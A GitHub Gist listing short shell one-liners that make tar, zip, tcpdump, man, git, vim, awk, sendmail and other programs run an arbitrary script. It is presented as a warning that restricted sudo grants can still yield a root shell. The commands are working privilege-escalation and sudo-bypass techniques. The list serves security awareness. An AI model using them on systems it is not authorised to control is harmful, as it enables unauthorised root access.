Last active
June 1, 2017 21:02
-
-
Save 0x9090/5444937462311cb5a075 to your computer and use it in GitHub Desktop.
Indirect Linux Command Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| These are some common Linux programs which can be used to execute other software. This demonstrates the risk of implicitly granting sudo privledges to non-suid programs. For example, if you lock down sudo to everything except for vim, then a local attacker could still open a full root shell with that limited sudo vim privledge. | |
| tcpdump | |
| $ tcpdump -n -i lo -G1 -w /dev/null -z ./program.sh | |
| tar | |
| $ tar c a.tar -I ./program.sh a | |
| zip | |
| $ zip z.zip a -T -TT ./program.sh | |
| ftp (and many others...) | |
| $ ftp | |
| ftp> ! ./program.sh | |
| man | |
| $ man -P /tmp/program.sh man | |
| git | |
| $ export PAGER=./program.sh | |
| $ git -p help | |
| bash $PATH variable | |
| $ export PATH=/tmp:$PATH | |
| $ ln -sf /tmp/program.sh /tmp/git-help | |
| $ git --exec-path=/tmp help | |
| bash $HOME variable | |
| $ ls -la .bashrc | |
| lrwxrwxrwx 1 root root 8 june 19 14:03 .bashrc -> program.sh | |
| $ export HOME=. | |
| $ bash | |
| awk | |
| $ awk 'BEGIN {system("./program.sh")}' | |
| expect | |
| $ expect -c './program.sh' | |
| vim | |
| $ vim test.txt | |
| $ <esc> | |
| $ :!{./program.sh} | |
| sendmail | |
| $ sendmail -be '${run{/bin/bash -c "id"}{yes}{no}}' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment